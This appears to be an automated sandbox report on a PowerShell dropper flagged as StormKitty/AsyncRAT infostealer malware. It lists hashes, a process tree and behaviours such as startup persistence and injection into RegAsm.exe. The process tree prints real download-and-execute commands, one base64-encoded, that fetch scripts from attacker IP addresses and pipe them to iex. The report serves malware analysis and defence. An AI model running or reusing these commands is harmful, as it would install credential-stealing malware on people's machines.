Analysis
-
max time kernel
95s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 18:13
Static task
static1
Behavioral task
behavioral1
Sample
2 ps1.ps1
Resource
win7-20240903-en
General
-
Target
2 ps1.ps1
-
Size
164B
-
MD5
005b395fecc3e18d5bc9acb93bf96a4f
-
SHA1
34db5ff90015817fe8b2fe56ca241d6965ae95d4
-
SHA256
5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
-
SHA512
199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/1892-74-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 3408 powershell.exe 8 3408 powershell.exe 18 1928 powershell.exe -
pid Process 2404 powershell.exe 3408 powershell.exe 1928 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3048 Package.exe -
Loads dropped DLL 1 IoCs
pid Process 3048 Package.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1928 set thread context of 1892 1928 powershell.exe 96 -
Program crash 1 IoCs
pid pid_target Process procid_target 1328 3048 WerFault.exe 86 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Package.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2404 powershell.exe 2404 powershell.exe 3408 powershell.exe 3408 powershell.exe 3408 powershell.exe 3408 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1892 RegAsm.exe 1892 RegAsm.exe 1892 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2404 powershell.exe Token: SeDebugPrivilege 3408 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1892 RegAsm.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3048 Package.exe 3048 Package.exe 3048 Package.exe 1892 RegAsm.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2404 wrote to memory of 3408 2404 powershell.exe 84 PID 2404 wrote to memory of 3408 2404 powershell.exe 84 PID 3408 wrote to memory of 4684 3408 powershell.exe 85 PID 3408 wrote to memory of 4684 3408 powershell.exe 85 PID 4684 wrote to memory of 3048 4684 cmd.exe 86 PID 4684 wrote to memory of 3048 4684 cmd.exe 86 PID 4684 wrote to memory of 3048 4684 cmd.exe 86 PID 3048 wrote to memory of 4536 3048 Package.exe 87 PID 3048 wrote to memory of 4536 3048 Package.exe 87 PID 3048 wrote to memory of 4536 3048 Package.exe 87 PID 4536 wrote to memory of 1928 4536 cmd.exe 89 PID 4536 wrote to memory of 1928 4536 cmd.exe 89 PID 4536 wrote to memory of 1928 4536 cmd.exe 89 PID 1928 wrote to memory of 512 1928 powershell.exe 92 PID 1928 wrote to memory of 512 1928 powershell.exe 92 PID 1928 wrote to memory of 512 1928 powershell.exe 92 PID 512 wrote to memory of 1628 512 csc.exe 93 PID 512 wrote to memory of 1628 512 csc.exe 93 PID 512 wrote to memory of 1628 512 csc.exe 93 PID 1928 wrote to memory of 1852 1928 powershell.exe 94 PID 1928 wrote to memory of 1852 1928 powershell.exe 94 PID 1928 wrote to memory of 1852 1928 powershell.exe 94 PID 1928 wrote to memory of 1660 1928 powershell.exe 95 PID 1928 wrote to memory of 1660 1928 powershell.exe 95 PID 1928 wrote to memory of 1660 1928 powershell.exe 95 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96 PID 1928 wrote to memory of 1892 1928 powershell.exe 96
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\2 ps1.ps1"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\Temp\Package.exeC:\Windows\Temp\Package.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\auibcdct\auibcdct.cmdline"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC803.tmp" "c:\Users\Admin\AppData\Local\Temp\auibcdct\CSC8E5B6C98AD694F06A9A968F3D1F62311.TMP"8⤵
- System Location Discovery: System Language Discovery
PID:1628
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:1852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:1660
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1892
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 2125⤵
- Program crash
PID:1328
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3048 -ip 30481⤵PID:3852
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
1KB
MD5dd6ac972c02b60474add9992e6361d7e
SHA126a959e68f4fbe32dbcfb715db359b8a6c230592
SHA256c8f0b7bc998cbda3141910523b9add89b2e38b6749a546d9b90cc9b234570a0b
SHA512c5014a57fd26df29422a87b927e0708218a416b512603437c92ec008609289a1f31bdedac2b4b38c6836022ad94e985d05c11d319a9b650f166fb8d02654a2c8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5a909239057ffff655d44e5ee6117fc55
SHA11c43803068224d44b0b282865a448baf461c4565
SHA2569394f7283718823211a15b1c43bf839cdc8280ff61c2386ddc95b24492954383
SHA512b526ac0f267d921a4ef3c1ab6150afa3949270c4cefd6ff9f55f6aad393c316cf167ddead3a9a23beada60a1624efc89ae2f3e5dfefdc67968942c14a7e3d221
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
88KB
MD533ae2b9c3e710254fe2e2ce35ff8a7c8
SHA1109e32187254b27e04ef18bbe1b48fad42bca841
SHA2569c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
SHA5122abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
Filesize
652B
MD57d8f41167c31fb01c469980f1bdbc718
SHA11386f1b74a64a64ef18ffef69943d9360d98e932
SHA2566ae9fd4a3ba52b71a7d61eddd0f9660ab7a0cf0728634b17ee3f8c855f745651
SHA512e6d9db57f3987fffd9691bc4898f11f1378b964bfef1ef144629e548cd7dfd96eb93bf0d1c71362fb8588dc05e9a441252cddb1aea7f9c48c20a5b5041f38384
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD5081b86672ebd471f37cea56452f00457
SHA1ed77a18ed1ea2e43aec7423aff82be61fcc54645
SHA256863e2e82d4c4bca5a7fd770b0d572d7bcfc0ceefa5fd78c9187e4010548965cb
SHA51282ea3273c995b33162351ddd25ac3c31df3a7a5dd92920f45b915af697a90801148111b787164032567784abb9d96442d6b71002dfe096ac273f022ae103186d